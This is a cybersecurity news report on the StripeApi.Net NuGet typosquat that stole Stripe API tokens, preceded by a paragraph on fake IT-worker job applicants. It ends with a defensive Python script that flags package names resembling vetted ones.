In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies to take advantage of the fact that they are unlikely to enforce rigorous background checks. “Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added. “A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.”


Malicious StripeApi NuGet Package Mimicked Official Library and Stole API Tokens

Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector. The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net , a legitimate library from Stripe that has over 75 million downloads. It was uploaded by a user named StripePayments on February 16, 2026. The package is no longer available.

“The NuGet page for the malicious package is set up to resemble the official Stripe.net package as closely as possible,” ReversingLabs’ Petar Kirhmajer said. “It uses the same icon as the legitimate package and contains a nearly identical readme, only swapping the ‘Stripe.net’ references to read ‘Stripe-net.’” In a further effort to lend credibility to the typosquatted package, the threat actor behind the campaign is said to have artificially inflated the download count to more than 180,000. But in an interesting twist, the downloads were split across 506 versions, with each version recording about 300 downloads on average. The package replicates some of the legitimate Stripe package’s functionality, but also modifies certain critical methods to collect and transfer sensitive data, including the user’s Stripe API token, back to the threat actor.

With the rest of the codebase remaining fully functional, it’s unlikely to attract any suspicion from unsuspecting developers who may have inadvertently downloaded it. ReversingLabs said it discovered and reported the package “relatively soon” after it was initially released, causing it to be taken down before it could inflict any serious damage. The software supply chain security company also noted that the activity marks a shift from prior campaigns that have leveraged bogus NuGet packages to target the cryptocurrency ecosystem and facilitate wallet key theft. “Developers who mistakenly download and integrate a typosquatted library like StripeAPI.net will still have their applications compile successfully and function as intended,” Kirhmajer said.

“Payments would process normally and, from the developer’s perspective, nothing would appear broken. In the background, however, sensitive data is being secretly copied and exfiltrated by malicious actors.”
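As an added example that is neither ReversingLabs' nor Stripe's code, this Python check scans a .csproj for PackageReference IDs that are not on a vetted allowlist yet closely resemble an allowlisted one, which is how a name like StripeApi.Net stands out next to Stripe.net. The allowlist, the .csproj fragment, the placeholder versions and the 0.8 similarity threshold are constructed assumptions.

```python
import difflib
import re
import xml.etree.ElementTree as ET

# Constructed allowlist of vetted package IDs; Stripe.net is the legitimate
# library named in the article, the other two are ordinary dependencies.
ALLOWED_PACKAGES = {"Stripe.net", "Newtonsoft.Json", "Serilog"}

# Constructed .csproj fragment: the typosquat from the article next to
# legitimate references (versions are placeholders).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="StripeApi.Net" Version="1.0.0" />
    <PackageReference Include="Newtonsoft.Json" Version="1.0.0" />
    <PackageReference Include="Serilog" Version="1.0.0" />
  </ItemGroup>
</Project>"""

def normalize(package_id):
    """Lower-case and drop separators so 'Stripe.net' and 'Stripe-net' compare equal."""
    return re.sub(r"[.\-_]", "", package_id.lower())

def package_references(csproj_text):
    """Return the Include attribute of every PackageReference element."""
    root = ET.fromstring(csproj_text)
    return [el.get("Include") for el in root.iter("PackageReference") if el.get("Include")]

def check_typosquats(csproj_text, allowed=ALLOWED_PACKAGES, threshold=0.8):
    """Flag references that are not allowlisted but closely resemble an allowlisted ID.
    A reference resembling nothing on the list is not reported here; that is a
    separate 'unknown dependency' policy decision."""
    allowed_norm = {normalize(p): p for p in allowed}
    findings = []
    for ref in package_references(csproj_text):
        norm_ref = normalize(ref)
        if norm_ref in allowed_norm:
            continue  # exact match with a vetted package (case/separator-insensitive)
        best_id, best_ratio = None, 0.0
        for norm_allowed, original in allowed_norm.items():
            ratio = difflib.SequenceMatcher(None, norm_ref, norm_allowed).ratio()
            if ratio > best_ratio:
                best_id, best_ratio = original, ratio
        if best_ratio >= threshold:
            findings.append({"reference": ref, "resembles": best_id,
                             "similarity": round(best_ratio, 3)})
    return findings

if __name__ == "__main__":
    for f in check_typosquats(SAMPLE_CSPROJ):
        print(f"suspicious: {f['reference']} resembles {f['resembles']} ({f['similarity']})")
```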